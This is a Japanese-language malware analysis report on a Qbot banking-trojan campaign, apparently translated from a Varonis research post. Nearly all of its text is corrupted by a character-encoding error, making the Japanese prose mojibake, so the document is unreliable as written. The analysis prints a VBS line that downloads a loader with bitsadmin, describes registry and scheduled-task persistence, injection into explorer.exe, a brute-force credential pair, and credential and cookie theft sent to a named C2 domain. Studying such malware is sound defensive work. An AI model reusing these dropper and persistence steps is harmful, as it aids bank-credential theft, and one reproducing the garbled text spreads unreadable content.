æ°ããçš®é¡ã®ãã«ãŠã§ã¢ã䜿çšããã°ããŒãã«ãªãµã€ããŒæ»æ
QbotãœãããŠã§ã¢ã ãã£ã³ããŒã³ã¯ç©æ¥µçã«ã¢ã¡ãªã«ã®äŒæ¥ãã¿ãŒã²ããã«ããŠããŸãããäžçäžã®ãããã¯ãŒã¯ãæ»æãããšãŒããããã¢ãžã¢ããã·ã¢ãåã¢ã¡ãªã«ã®è³ãæã§è¢«å®³ãåããéè¡å£åº§ã®è³æ Œæ å ±ãå«ãæ©å¯ã®è²¡åæ å ±ãçã¿ãŸããã
åæäžã«ããã®Qbotã®ããªãšãŒã·ã§ã³ã®ã³ãŒãã解æããåäœäžã®æ»æå¶åŸ¡ã³ãã³ãã»ã³ã¿ãŒãç¹å®ããŸãããããã«ãããææã®çšåºŠãå€æã§ããŸããã C2ãµãŒããŒãçŽæ¥èŠ³å¯ãããšãããäžçäžã®æ°å人ã®è¢«å®³è ããã§ã«äŸµå®³ãããŠãããæ»æè ã«ãã£ãŠç©æ¥µçã«ç£èŠãããŠããããšãæããã«ãªããŸããã CïŒCãµãŒããŒã§èŠã€ãã£ãè¿œå æ å ±ã¯ããã®ãã£ã³ããŒã³ã®èåŸã«ããçŽæ¥ã®åå è ã®çè·¡ãæããã«ããŸããã
æ»æã¯å ã Varonis DatAlertã«ãã£ãŠçºèŠãããŸããã
åç±³ã®é¡§å®¢ã Varonis DatAlertã¯ãçããããœãããŠã§ã¢ã®ããŠã³ããŒããã»ãã¥ãªãã£å¢çå ã®ç§»åïŒå éšã®æšªæ¹åã®åãïŒãããã³çããããããã¯ãŒã¯ã¢ã¯ãã£ããã£ã«ã€ããŠèŠåããŸããã
ç§ãã¡ã®ããŒã ã¯çŸåšããã®äºä»¶ã調æ»ããŠããåœå±ãšç©æ¥µçã«ååããŠãããè¿œå ã®éå ¬éæ å ±ãæäŸããŠããŸãã ãã®èšäºã§ã¯ãé瀺ãèš±å¯ãããŠããæ å ±ãå ±æããŸãã
ãã³ãã³ã°ãã«ãŠã§ã¢Qbotã®æ°ããããŒãžã§ã³
ãã®æªæã®ãããã£ã³ããŒã³ã®éå¶è ã¯ãéè¡ã®è³æ Œæ å ±ãçãããã«èšèšãããæåã§æŽç·Žããããã«ãŠã§ã¢ã§ããQbotã®æ°ããããŒãžã§ã³ã䜿çšããŸããã Qbotã¯é«åºŠãªã¢ã³ãåæææ³ã䜿çšããå€ãã®å Žåãæ€åºããé ããããæ°ããææãã¯ã¿ãŒã䜿çšããŠãå©çšå¯èœãªä¿è·å¯Ÿçãå åãããŸãã
ãã«ãŠã§ã¢ã¯å€æ æ§ã§ãããåžžã«å€åããŠããŸãã
- 圌女ã¯ã©ã³ãã ãªååã§ãã¡ã€ã«ãšãã©ã«ããŒãäœæããŸã
- ãã®æŽæ°ããŒããŒã¯ãã°ãã°C2ãµãŒããŒãå€æŽããŸã
- ã€ã³ã¿ãŒãããæ¥ç¶ãã¢ã¯ãã£ãã«ãªããšãã«ãŠã§ã¢ããŠã³ããŒããŒãå€æŽãããŸãïŒããã«ã€ããŠã¯åŸã§èª¬æããŸãïŒ
QbotïŒãŸãã¯QakbotïŒã¯2009幎ã«åããŠç¹å®ããããã以æ¥å€§å¹ ã«é²åããŠããŸãã äž»ã«ããªã³ã©ã€ã³ã€ã³ã¿ãŒãããã»ãã·ã§ã³ããã®ããŒã¿ãšéèWebãµã€ãã«é¢é£ããããŒã¿ãåéããããšãç®çãšããŠããŸãã ãã®ãããã¯ãŒã¯ã¯ãŒã æ©èœã«ãããçµç¹ã®ãããã¯ãŒã¯ãä»ããŠæ¡æ£ããä»ã®ã·ã¹ãã ã«ææããããšãã§ããŸãã
çºèŠ
ç§ãã¡ã®ããŒã ã¯ã顧客ããã®é»è©±ã®åŸã§èª¿æ»ãéå§ããŸãããããã§ã¯ãæ¢ã«å®è£ ãããŠããDatAlertãã·ã¹ãã ã§ã®çããã掻åã«ã€ããŠèŠåããŸããã 調æ»ã®çµæã
å°ãªããšã1å°ã®ã³ã³ãã¥ãŒã¿ãŒããã«ãŠã§ã¢ã«ææããŠãããä»ã®ãããã¯ãŒã¯ãµãŒããŒãžã®æ¡æ£ã®è©Šã¿ãæ€åºãããŠããŸãã
ã¯ãŒã ã®ãµã³ãã«ãæœåºãããåæã®ããã«Varonisç 究ããŒã ã«éãããŸããã ãã®ãã¿ãŒã³ã¯æ¢åã®ããã·ã¥ãšäžèŽããããããªã調æ»ã«ããããããæ°ããæ ªã§ããããšãæããã«ãªããŸããã
ã¹ããŒãž1ïŒãããããŒ
ãã¡ã€ã«åïŒREQ_02132019b.doc.vbs
Qbotã®ä»¥åã®ããŒãžã§ã³ã§ã¯ãWordææžå ã®è¢«å®³è ã®ã³ã³ãã¥ãŒã¿ãŒã§ãã¯ããå®è¡ãããŠããŸããã 調æ»ã®éçšã§ãæ¡åŒµåã.doc.vbsã®zipãã¡ã€ã«ãæ€åºãããŸãããããã¯ãæåã®ææããããã
ãã£ãã·ã³ã°ã¡ãŒã«ãæªæã®ããã¹ã¯ãªããVBSïŒVisual Basic ScââriptïŒã®çºä¿¡å ã
VBSã¯ãå®è¡ããããšãç ç²ïŒ°ïŒ£ã®ãªãã¬ãŒãã£ã³ã°ã·ã¹ãã ããŒãžã§ã³ãèå¥ããã€ã³ã¹ããŒã«ãããã¢ã³ããŠã€ã«ã¹ãœãããŠã§ã¢ã®æ€åºãè©Šã¿ãŸãã ãã«ãŠã§ã¢ã¯ãDefenderãVirusãAntivirusãMalwãTrendãKasperskyãKavãMcAfeeãSymantecã®è¡ãæ¢ããŸãã
æ°ããããŒãžã§ã³ã§ã¯ããã«ãŠã§ã¢ã¯BITSAdminã䜿çšããŠããŒãããŒããŒãããŠã³ããŒãããŸãã PowerShellã¯ä»¥åã®ããŒãžã§ã³ã®ãã«ãŠã§ã¢ã§äœ¿çšãããŠãããããããã¯æ°ããåäœã§ãã
BITSAdminã¯ã次ã®ãµã€ãã®ããããããããŒãããŒããŒãããŠã³ããŒãããŸãã
次ã«ãBITSAdminã䜿çšããŠããŒãããŒããŒãããŠã³ããŒãããããã®VBSã³ãŒãã瀺ããŸãã
intReturn = wShell.Run ('bitsadmin / transfer qahdejob' & Second (Now) & '/ Priority HIGH '& el & urlStr ' ' & tempFile, 0, True)
第2段éïŒè¶³å Žãç¯ããexplorer.exeã§ã«ãŒããååŸãã
ãã¡ã€ã«åïŒwidgetcontrol.png
æªæã®ããããã°ã©ã ã®ã«ãŒãã«ãå«ãããŒãããŒããŒã«ã¯ããã€ãã®ããŒãžã§ã³ããããå®è¡åŸãåžžã«æŽæ°ãããŸãã æææã«è¢«å®³è ãåãåãããŒãžã§ã³ã¯ãVBSãã¡ã€ã«ã«ããŒãã³ãŒããããŠããspãã©ã¡ãŒã¿ãŒã«ãã£ãŠç°ãªããŸãã
æªæã®ããæ©èœã¯ãããŒãããŒããŒã®åããŒãžã§ã³ãç°ãªãããžã¿ã«èšŒææžã§çœ²åãããããšã§ãã ä¿¡é Œã§ãã蚌ææžã¯éåžžããã¡ã€ã«ãä¿¡é ŒãããŠããããšã瀺ããŸããã眲åãããŠããªãå®è¡å¯èœãã¡ã€ã«ã¯çããããã®ã§ãã
Qbotã¯ãåœé ãŸãã¯çãŸããæå¹ãªããžã¿ã«èšŒææžã䜿çšããŠä¿¡é Œæ§ãé«ãããªãã¬ãŒãã£ã³ã°ã·ã¹ãã ã§ã®æ€åºãåé¿ããããšãç¥ãããŠããŸãã
å©çšå¯èœãªãã¹ãŠã®ããŒãžã§ã³ã®ããŒãããŒããŒãããŠã³ããŒããïŒäžèšã®äŸµå®³ã®å åãåç §ïŒã蚌ææžãæ¯èŒããŸããã
ãã«ãŠã§ã¢ã䜿çšãã蚌ææžïŒ
- Saiitech Systems Limited
- Ecdjb Limited
- Hitish Patel Consulting Ltd
- ãã¢ã¬éå®
- INTENTEK LIMITED
- Austek Consulting Limited
- IO Pro Limited
- Vercoe IT Ltd
- Edsabame Consultants Ltd
- SOVA CONSULTANCY LTD
蚌ææžã®1ã€ã®äŸïŒ
çãå ·
ååèµ·åæã«ãããŒãããŒããŒã¯èªèº«ãïŒ AppdataïŒ \ Roaming \ {Random line}ã«ã³ããŒãã次ãäœæããŸãã
- ç»é²ïŒãŠãŒã¶ãŒããã°ã€ã³ãããšãã«å®è¡ããæ¢ç¥ã®ã¬ãžã¹ããªããŒã«èªèº«ãæžã蟌ã¿ãŸãã
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run - ã¿ã¹ã¯ã¹ã±ãžã¥ãŒã©ïŒæ¬¡ã®ãã¹ãã5æéããšã«ãã«ãŠã§ã¢ãèµ·åããã¿ã¹ã¯ãäœæãããŸã
ïŒ AppdataïŒ \ããŒãã³ã°\ Microsoft \ {ã©ã³ãã åãããæåå} - ã¹ã¿ãŒãã¢ããïŒ Qbotã¯ãã¹ã¿ãŒãã¢ãããŠãŒã¶ãŒãã£ã¬ã¯ããªã«èªåå®è¡ããã·ã§ãŒãã«ãããäœæããŸã
ææããExplorer.exe
ããŒãããŒããŒã¯ã32ãããã®explorer.exeãšã¯ã¹ãããŒã©ãŒããã»ã¹ãèµ·åããããã«æ¿å ¥ããŸã
ã¡ã€ã³ãã€ããŒãã
ãã€ããŒãããã§ã«RWXã¡ã¢ãªã»ã°ã¡ã³ããšããŠã€ã³ã¹ããŒã«ãããŠããexplorer.exeããã»ã¹ã®ãã³ãã次ã«ç€ºããŸãã
å±éåŸãããŒãããŒããŒã¯å ã®å®è¡å¯èœãã¡ã€ã«ãcalc.exeã®32ãããããŒãžã§ã³ã§äžæžãããŸãã
"CïŒ\ Windows \ System32 \ cmd.exe" / c ping.exe-N 6 127.0.0.1ïŒã¿ã€ã "CïŒ\ Windows \ System32 \ calc.exe"> CïŒ\ãŠãŒã¶ãŒ\ {TKTKTK} \ãã¹ã¯ããã\ 1 .exe
ã¹ããŒãž3ïŒéãã«ãã£ãããšãéãçã
ã·ã¹ãã ã§ä¿®æ£ãããåŸããã«ãŒããã©ãŒã¹ã¢ãžã¥ãŒã«ã¯ãããã¯ãŒã¯äžã§ãã¹ã¯ãŒããšã¢ã«ãŠã³ãã®ãœãŒããéå§ããŸãã ãã«ãŠã§ã¢ããã¡ã€ã³ã¢ã«ãŠã³ãã䟵害ããå ŽåãDomain Usersã°ã«ãŒãã®ãŠãŒã¶ãŒã®ãªã¹ããèªã¿åãããããã®ã¢ã«ãŠã³ãã®ãœãŒããéå§ããŸãã ããŒã«ã«ã¢ã«ãŠã³ãã䟵害ãããå Žåããã«ãŠã§ã¢ã¯ãããŒã«ã«ãŠãŒã¶ãŒã®äºåèšå®æžã¿ã®æšæºãªã¹ãã䜿çšããŸãã èªèšŒã®è©Šè¡ã§ã¯ãNTLMãšWNetAddConnection APIã䜿çšããŸãã
ããŒã«ã«ã¢ã«ãŠã³ããå埩åŠçãããšãã«ãã«ãŠã§ã¢ã䜿çšãããŠãŒã¶ãŒåãšãã¹ã¯ãŒããæœåºããŸããïŒ ãã¡ã ïŒã æªæã®ããããã°ã©ã ã¯ãããã®èŸæžãéçåæããé ããŸãããå®è¡æã«æœåºã§ããŸãã
X32dbgãšã¯ã¹ãããŒã©ãŒãšã¯ã¹ãããŒã©ãŒã€ã¡ãŒãžã管çè ãŠãŒã¶ãŒãšãã¹ã¯ãŒã12345678ã§ãªã¢ãŒãã³ã³ãã¥ãŒã¿ãŒãžã®æ¥ç¶ãè©Šã¿ãŸãã
ããªãã®ãéãéã¶
Qbotã®äž»ãªç®æšã¯ã被害è ããã®ãéã®çé£ã§ãã 圌ã¯ããã€ãã®æ¹æ³ã䜿çšããŠã財åãäŒèšããã®ä»ã®æ å ±ãçã¿ãæ»æè ã®ãµãŒããŒã«éä¿¡ããŸãã
- ããŒãã¬ãŒ-Qbotã¯ã被害è ãå ¥åããåããŒã¹ãããŒã¯ããã£ããã£ããŠéä¿¡ããæ»æè ã«ããŠã³ããŒãããŸã
- è³æ Œæ å ±/ã»ãã·ã§ã³Cookie-Qbotã¯ä¿åãããè³æ Œæ å ±/ Cookieããã©ãŠã¶ãŒããæ€çŽ¢ããæ»æè ã«éä¿¡ããŸã
- çèŽ-æªæã®ãããã€ããŒãã¯ã·ã¹ãã ã®ãã¹ãŠã®ããã»ã¹ã«åã蟌ãŸããAPIåŒã³åºããã€ã³ã¿ãŒã»ããããããã»ã¹ããéè/éè¡ã®è¡ãè³æ Œæ å ±ããŸãã¯ã»ãã·ã§ã³Cookieãæ¢ããŠæ»æè ã«ããŒãããã³ãŒãã䜿çšããŸãã
次ã®å³ã¯ãéè¡ã®ãŠã§ããµã€ãbuisnessline.huntington.comã§ã®èªèšŒäžã«ãæªæã®ããããã°ã©ã ãPOSTãªã¯ãšã¹ããšã»ãã·ã§ã³Cookieã®ããŒã¿ãC2ãµãŒããŒcontent.bigflimz.comã«éä¿¡ããããšã瀺ããŠããŸãã
C2æ»æè ãµãŒããŒå
æ»æè ã®ãµã€ãã®1ã€ã§ã被害è ã®IPã¢ãã¬ã¹ããªãã¬ãŒãã£ã³ã°ã·ã¹ãã ã«é¢ããæ å ±ãããã³ãŠã€ã«ã¹å¯Ÿç補åã®ååãå«ããã°ãã¡ã€ã«ãèŠã€ããããšãã§ããŸããã C2ãµãŒããŒã¯ãéå»ã®æ»æã«é¢ããæ å ±ãšããã«ãŠã§ã¢ã®è¿œå ããŒãžã§ã³ïŒäžèšã®äŸµå®³ã€ã³ãžã±ãŒã¿ã»ã¯ã·ã§ã³ã®ããŒãžã§ã³ã®è¡šïŒã瀺ããŸããã
äžéšã®çµæã«ã¯éè€ãå«ãŸããå ŽåããããŸããã以äžã¯æ€åºãããäžäœ10ãåœããŠã€ã«ã¹å¯Ÿç補åãããã³ãªãã¬ãŒãã£ã³ã°ã·ã¹ãã ã§ãã ãŸããæ»æã®ç ç²è ã¯ãã·ã¢ã®å€§èŠæš¡ãªéèæ©é¢ã§ãã£ãããšãç¥ãããŠããŸãã
ãã¹ãŠã®ããŒã¿ã¯Githubãªããžããªã«ã¢ããããŒããããŸã ã
2,726ã®äžæã®è¢«å®³è IPãèŠã€ãããŸããã å€ãã®çµç¹ã§ã¯ãå éšIPã¢ãã¬ã¹ã被害è ã®æ°ã
ãããããã£ãšããããããã§ãããã
å³ïŒåœã«ããç ç²è
å³ïŒãªãã¬ãŒãã£ã³ã°ã·ã¹ãã å¥ã®è¢«å®³è
å³ïŒäœ¿çšããããŠã€ã«ã¹å¯Ÿçã«ãã被害è
䟵害ã€ã³ãžã±ãŒã¿
䟵害ã®ãã¹ãŠã®ææšã¯ã ãã¡ãã® Github ã§èŠã€ããããšãã§ããŸã ã
ããŒãããŒããŒã®ããŒãžã§ã³
å®å šãªãªã¹ãã¯ããã«ãããŸã ã